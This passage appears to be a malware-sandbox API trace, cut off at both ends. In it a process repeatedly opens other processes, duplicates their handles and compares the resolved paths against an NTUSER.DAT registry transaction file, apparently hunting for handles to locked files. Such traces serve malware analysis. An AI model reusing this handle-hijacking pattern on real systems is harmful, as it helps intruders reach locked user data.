lpExitCode=0x32ee30) returned 1 [0166.565] CloseHandle (hObject=0x1e4) returned 1 [0166.566] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.566] CloseHandle (hObject=0x194) returned 1 [0166.566] CloseHandle (hObject=0x1e8) returned 1 [0166.566] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x970) returned 0x1e8 [0166.566] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.566] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.566] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.567] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.567] CloseHandle (hObject=0x1e4) returned 1 [0166.567] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.567] CloseHandle (hObject=0x194) returned 1 [0166.568] CloseHandle (hObject=0x1e8) returned 1 [0166.568] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x970) returned 0x1e8 [0166.568] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.568] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.568] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.569] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.569] CloseHandle (hObject=0x1e4) returned 1 [0166.569] _wcsicmp (_Str1="\\Microsoft Analysis Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.569] CloseHandle (hObject=0x194) returned 1 [0166.569] CloseHandle (hObject=0x1e8) returned 1 [0166.569] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x980) returned 0x1e8 [0166.570] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.570] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.570] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.571] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.571] CloseHandle (hObject=0x1e4) returned 1 [0166.571] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.571] CloseHandle (hObject=0x194) returned 1 [0166.571] CloseHandle (hObject=0x1e8) returned 1 [0166.571] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x980) returned 0x1e8 [0166.571] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.571] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.572] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.573] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.573] CloseHandle (hObject=0x1e4) returned 1 [0166.573] _wcsicmp (_Str1="\\Microsoft Synchronization Services", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.573] CloseHandle (hObject=0x194) returned 1 [0166.573] CloseHandle (hObject=0x1e8) returned 1 [0166.573] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x990) returned 0x1e8 [0166.573] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.574] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.575] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.575] CloseHandle (hObject=0x1e4) returned 1 [0166.575] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.575] CloseHandle (hObject=0x194) returned 1 [0166.575] CloseHandle (hObject=0x1e8) returned 1 [0166.575] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x990) returned 0x1e8 [0166.575] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.575] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.576] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.577] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.577] CloseHandle (hObject=0x1e4) returned 1 [0166.577] _wcsicmp (_Str1="\\Windows Sidebar", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.577] CloseHandle (hObject=0x194) returned 1 [0166.577] CloseHandle (hObject=0x1e8) returned 1 [0166.577] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a0) returned 0x1e8 [0166.577] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.577] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.578] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.578] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.579] CloseHandle (hObject=0x1e4) returned 1 [0166.579] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.579] CloseHandle (hObject=0x194) returned 1 [0166.579] CloseHandle (hObject=0x1e8) returned 1 [0166.579] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9a0) returned 0x1e8 [0166.579] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.579] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.580] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.580] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.580] CloseHandle (hObject=0x1e4) returned 1 [0166.580] _wcsicmp (_Str1="\\Internet Explorer", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -5 [0166.580] CloseHandle (hObject=0x194) returned 1 [0166.581] CloseHandle (hObject=0x1e8) returned 1 [0166.581] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b0) returned 0x1e8 [0166.581] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.581] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.581] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.582] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.582] CloseHandle (hObject=0x1e4) returned 1 [0166.582] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.582] CloseHandle (hObject=0x194) returned 1 [0166.583] CloseHandle (hObject=0x1e8) returned 1 [0166.583] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9b0) returned 0x1e8 [0166.583] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.583] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.583] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.584] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.584] CloseHandle (hObject=0x1e4) returned 1 [0166.584] _wcsicmp (_Str1="\\Adobe", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -13 [0166.584] CloseHandle (hObject=0x194) returned 1 [0166.585] CloseHandle (hObject=0x1e8) returned 1 [0166.585] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9c0) returned 0x1e8 [0166.585] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.585] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.595] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.596] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.597] CloseHandle (hObject=0x1e4) returned 1 [0166.597] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.597] CloseHandle (hObject=0x194) returned 1 [0166.597] CloseHandle (hObject=0x1e8) returned 1 [0166.597] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9c0) returned 0x1e8 [0166.597] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.597] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.598] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.598] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.598] CloseHandle (hObject=0x1e4) returned 1 [0166.599] _wcsicmp (_Str1="\\Microsoft SQL Server Compact Edition", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.599] CloseHandle (hObject=0x194) returned 1 [0166.599] CloseHandle (hObject=0x1e8) returned 1 [0166.599] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0166.599] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.599] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.600] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.600] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.600] CloseHandle (hObject=0x1e4) returned 1 [0166.600] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.600] CloseHandle (hObject=0x194) returned 1 [0166.601] CloseHandle (hObject=0x1e8) returned 1 [0166.601] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0166.601] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.601] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.601] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.602] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.602] CloseHandle (hObject=0x1e4) returned 1 [0166.602] _wcsicmp (_Str1="\\Microsoft Sync Framework", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned -1 [0166.602] CloseHandle (hObject=0x194) returned 1 [0166.603] CloseHandle (hObject=0x1e8) returned 1 [0166.603] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9d0) returned 0x1e8 [0166.603] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.603] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.604] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.604] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.604] CloseHandle (hObject=0x1e4) returned 1 [0166.604] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.605] CloseHandle (hObject=0x194) returned 1 [0166.605] CloseHandle (hObject=0x1e8) returned 1 [0166.605] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0166.605] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x10, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.605] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.606] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.606] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.606] CloseHandle (hObject=0x1e4) returned 1 [0166.607] _wcsicmp (_Str1="\\Windows", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.607] CloseHandle (hObject=0x194) returned 1 [0166.607] CloseHandle (hObject=0x1e8) returned 1 [0166.607] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0166.607] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.607] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.608] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.608] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.608] CloseHandle (hObject=0x1e4) returned 1 [0166.609] _wcsicmp (_Str1="\\Windows Media Player", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 9 [0166.609] CloseHandle (hObject=0x194) returned 1 [0166.609] CloseHandle (hObject=0x1e8) returned 1 [0166.609] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x9e0) returned 0x1e8 [0166.609] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x7c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.609] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.609] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.610] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.610] CloseHandle (hObject=0x1e4) returned 1 [0166.610] _wcsicmp (_Str1="\\StaticCache.dat", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.610] CloseHandle (hObject=0x194) returned 1 [0166.610] CloseHandle (hObject=0x1e8) returned 1 [0166.610] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0166.611] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.611] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.611] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.612] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.612] CloseHandle (hObject=0x1e4) returned 1 [0166.612] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.612] CloseHandle (hObject=0x194) returned 1 [0166.612] CloseHandle (hObject=0x1e8) returned 1 [0166.613] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0166.613] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.613] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.613] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.614] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.614] CloseHandle (hObject=0x1e4) returned 1 [0166.614] CloseHandle (hObject=0x194) returned 1 [0166.614] CloseHandle (hObject=0x1e8) returned 1 [0166.614] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0166.614] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.614] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.615] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.616] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.616] CloseHandle (hObject=0x1e4) returned 1 [0166.616] CloseHandle (hObject=0x194) returned 1 [0166.616] CloseHandle (hObject=0x1e8) returned 1 [0166.616] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa0c) returned 0x1e8 [0166.616] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1b8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.616] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.617] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.623] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.623] CloseHandle (hObject=0x1e4) returned 1 [0166.623] CloseHandle (hObject=0x194) returned 1 [0166.623] CloseHandle (hObject=0x1e8) returned 1 [0166.623] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0166.623] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.623] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.624] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.625] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.625] CloseHandle (hObject=0x1e4) returned 1 [0166.625] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 5 [0166.625] CloseHandle (hObject=0x194) returned 1 [0166.625] CloseHandle (hObject=0x1e8) returned 1 [0166.625] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0166.625] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xa8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.625] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.626] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.626] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.627] CloseHandle (hObject=0x1e4) returned 1 [0166.627] CloseHandle (hObject=0x194) returned 1 [0166.627] CloseHandle (hObject=0x1e8) returned 1 [0166.627] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0xa40) returned 0x1e8 [0166.627] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x1d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0166.627] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0166.627] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0166.628] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0166.628] CloseHandle (hObject=0x1e4) returned 1 [0166.628] CloseHandle (hObject=0x194) returned 1 [0166.628] CloseHandle (hObject=0x1e8) returned 1 [0166.628] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, 